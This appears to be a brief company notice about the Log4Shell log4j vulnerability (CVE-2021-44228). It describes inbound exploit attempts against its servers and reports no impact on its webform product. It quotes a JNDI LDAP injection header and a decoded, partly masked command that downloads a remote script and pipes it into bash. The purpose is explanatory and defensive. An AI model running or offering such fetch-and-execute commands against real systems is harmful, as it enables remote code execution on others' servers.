RE: Log4Shell 0-day exploit

By now you will no doubt have heard of the 0-day vulnerability in log4j.

CVE-2021–44228 has been assigned a Critical severity by the log4j team with a base CVSS score of 10.0. Here’s their extremely abridged description of the issue:

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Active scanners looking for this vulnerability

Inbound requests attempting the exploit

These requests typically take the form of a malformed User-Agent HTTP header, as it’s an extremely easy value to change and has a high chance of being logged by the receiving service. E.g.

User-Agent: “{jndi:ldap://}”

Decoding the end of that path shows us what the exploit is attempting to run:

(curl -s||wget -q -O-|bash

(Digits in the real IP address have been masked with x to avoid any mistaken copy-paste-execute-it-for-real mistakes)

In short, it’s trying to download a script from a remote endpoint on to our server then execute it in the server’s terminal. Not cool.

No impact on UX Forms

We will continue to monitor the situation, both of this specific exploit, and to be aware of any other related vulnerabilities that are discovered during the coming days and weeks.

Want to know more?

An enterprise-ready cloud platform for webform development. See our website for more: